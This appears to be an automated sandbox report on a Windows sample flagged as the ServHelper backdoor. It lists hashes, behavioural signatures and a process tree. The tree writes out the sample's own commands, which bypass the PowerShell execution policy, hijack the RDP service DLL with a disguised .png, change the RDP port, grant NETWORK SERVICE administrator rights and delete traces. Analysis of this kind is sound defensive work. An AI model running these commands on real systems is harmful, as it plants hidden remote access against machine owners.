Analysis
-
max time kernel
87s -
max time network
150s -
platform
windows10_x64 -
resource
win10-en -
submitted
10-09-2021 15:37
Static task
static1
Behavioral task
behavioral1
Sample
6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe
Resource
win10-en
General
-
Target
6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe
-
Size
4.0MB
-
MD5
9cadcadb612787dc6c2e9901ffe49dec
-
SHA1
dfaeffadd7767ea23cabc31a59ae2cd461abf00f
-
SHA256
6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb
-
SHA512
e7d908a73e85965359169b9d3e14ec3f1f81218354aa09a8d6c027be230e30c4f334122b933579ce6ad35e5eaffc01c6d8124e5f1a11671b7f6b36549d55beff
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe 1836 powershell.exe 1836 powershell.exe 1836 powershell.exe 3336 powershell.exe 3336 powershell.exe 3336 powershell.exe 2652 powershell.exe 2652 powershell.exe 2652 powershell.exe 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 620 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeDebugPrivilege 3336 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.exedescription pid process target process PID 4684 wrote to memory of 4796 4684 6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe powershell.exe PID 4684 wrote to memory of 4796 4684 6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe powershell.exe PID 4684 wrote to memory of 4796 4684 6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe powershell.exe PID 4796 wrote to memory of 4984 4796 powershell.exe csc.exe PID 4796 wrote to memory of 4984 4796 powershell.exe csc.exe PID 4796 wrote to memory of 4984 4796 powershell.exe csc.exe PID 4984 wrote to memory of 5012 4984 csc.exe cvtres.exe PID 4984 wrote to memory of 5012 4984 csc.exe cvtres.exe PID 4984 wrote to memory of 5012 4984 csc.exe cvtres.exe PID 4796 wrote to memory of 1836 4796 powershell.exe powershell.exe PID 4796 wrote to memory of 1836 4796 powershell.exe powershell.exe PID 4796 wrote to memory of 1836 4796 powershell.exe powershell.exe PID 4796 wrote to memory of 3336 4796 powershell.exe powershell.exe PID 4796 wrote to memory of 3336 4796 powershell.exe powershell.exe PID 4796 wrote to memory of 3336 4796 powershell.exe powershell.exe PID 4796 wrote to memory of 2652 4796 powershell.exe powershell.exe PID 4796 wrote to memory of 2652 4796 powershell.exe powershell.exe PID 4796 wrote to memory of 2652 4796 powershell.exe powershell.exe PID 4796 wrote to memory of 4440 4796 powershell.exe reg.exe PID 4796 wrote to memory of 4440 4796 powershell.exe reg.exe PID 4796 wrote to memory of 4440 4796 powershell.exe reg.exe PID 4796 wrote to memory of 3056 4796 powershell.exe reg.exe PID 4796 wrote to memory of 3056 4796 powershell.exe reg.exe PID 4796 wrote to memory of 3056 4796 powershell.exe reg.exe PID 4796 wrote to memory of 4220 4796 powershell.exe reg.exe PID 4796 wrote to memory of 4220 4796 powershell.exe reg.exe PID 4796 wrote to memory of 4220 4796 powershell.exe reg.exe PID 4796 wrote to memory of 4596 4796 powershell.exe net.exe PID 4796 wrote to memory of 4596 4796 powershell.exe net.exe PID 4796 wrote to memory of 4596 4796 powershell.exe net.exe PID 4596 wrote to memory of 2824 4596 net.exe net1.exe PID 4596 wrote to memory of 2824 4596 net.exe net1.exe PID 4596 wrote to memory of 2824 4596 net.exe net1.exe PID 4796 wrote to memory of 2628 4796 powershell.exe cmd.exe PID 4796 wrote to memory of 2628 4796 powershell.exe cmd.exe PID 4796 wrote to memory of 2628 4796 powershell.exe cmd.exe PID 2628 wrote to memory of 4136 2628 cmd.exe cmd.exe PID 2628 wrote to memory of 4136 2628 cmd.exe cmd.exe PID 2628 wrote to memory of 4136 2628 cmd.exe cmd.exe PID 4136 wrote to memory of 3636 4136 cmd.exe net.exe PID 4136 wrote to memory of 3636 4136 cmd.exe net.exe PID 4136 wrote to memory of 3636 4136 cmd.exe net.exe PID 3636 wrote to memory of 648 3636 net.exe net1.exe PID 3636 wrote to memory of 648 3636 net.exe net1.exe PID 3636 wrote to memory of 648 3636 net.exe net1.exe PID 4796 wrote to memory of 1016 4796 powershell.exe cmd.exe PID 4796 wrote to memory of 1016 4796 powershell.exe cmd.exe PID 4796 wrote to memory of 1016 4796 powershell.exe cmd.exe PID 1016 wrote to memory of 4636 1016 cmd.exe cmd.exe PID 1016 wrote to memory of 4636 1016 cmd.exe cmd.exe PID 1016 wrote to memory of 4636 1016 cmd.exe cmd.exe PID 4636 wrote to memory of 4376 4636 cmd.exe net.exe PID 4636 wrote to memory of 4376 4636 cmd.exe net.exe PID 4636 wrote to memory of 4376 4636 cmd.exe net.exe PID 4376 wrote to memory of 3932 4376 net.exe net1.exe PID 4376 wrote to memory of 3932 4376 net.exe net1.exe PID 4376 wrote to memory of 3932 4376 net.exe net1.exe PID 4796 wrote to memory of 5032 4796 powershell.exe cmd.exe PID 4796 wrote to memory of 5032 4796 powershell.exe cmd.exe PID 4796 wrote to memory of 5032 4796 powershell.exe cmd.exe PID 4796 wrote to memory of 5036 4796 powershell.exe cmd.exe PID 4796 wrote to memory of 5036 4796 powershell.exe cmd.exe PID 4796 wrote to memory of 5036 4796 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe"C:\Users\Admin\AppData\Local\Temp\6d6134155811eb82705509295bd4b87c6aaad43c1b54048c20d3cbf680494dfb.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rlmeisxk\rlmeisxk.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF7F7.tmp" "c:\Users\Admin\AppData\Local\Temp\rlmeisxk\CSC4A66E73C306D4AD9B2C12ABD8513448.TMP"4⤵PID:5012
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:4440
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3056 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:4220
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2824
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:648
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3932
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:5032
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:5036
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
MD5
74b775dde5b64a7073a63fba3710daf7
SHA10cbde7105a33057d98c757ec2889060f42dc20b9
SHA256e1068b626c575132b600f0ff37d184c1e66eced103e5fa000c8699a5d21fa3d3
SHA512593361c6424364475d1845efaf0ef5a9e63c0c874bf2de598877587c32b1743f49810a5668ecabe747bbd9c169df2d28054a9802766fe1ade65df9391bb4c773
-
MD5
30303b0cc1d6833b7dc84fbb907822be
SHA1caaa99bb9a56a6974ba16fce6e01f4f95016b9f5
SHA25691b6b2284e42eb7bdf6371fcbaf1724027fc600cd9bb56ed81f2f7d8c784f617
SHA512117cb2e2c687d2cca1c069151df4c085dcb4a88e51b1f17b8b0e2f9ce1adf181ed76b8cc1c262bee45e34d7a8b513d5bf19a50f394064cf5c132fec23a6fb7da
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
f3a97dfa37559f866f4642a4334fb6a3
SHA124887b46412ae12ba79a904dce03fc2f3227da8b
SHA25661b59c8db4f80ad053d17cf3a12de540fbe26bcbbac52526e271eaccf8abac19
SHA512b897e95feb66819c7543a94a6e8cd79c24bf9db252935edba2be0090d159b2dc44d4f07ed79db50cdfb9ebeb7b5c6726680e245cfc00de4504d70dd237f73c1f
-
MD5
c38dfb364176fbc3900dc74e060b3d59
SHA165e77d4a5cad3daefeb7bfadef1f7f7b41c60fbb
SHA256765e9d00180d92f7cab7f9f61ecef00b61346875831ec208c3fa96de10e1d4f7
SHA5125671ab9d2a78a494f8c878e3014ccb0cb80c72893322cbd7d27f55106f1bceab4feedbfe918e6de33d46726fd741569b0694f8320209de97d76aa6ffcd338a5a
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
e27f848a662a392c72a76b090be8846d
SHA1ccfc9b963da1c36e00756123ea8a78c84215ebb9
SHA2567d3c4bcf16a95172c96964deb50c25473665b713980bb5baa999e3f1d0cb819d
SHA512746ccaa59dbdd0606d8c46cf438f4c5f405eaccc5ca611efca9f597c7b191ded79d1755e673cc923524f89174ee5a6d5b259e28ce6dc168bf605e9e879c28b28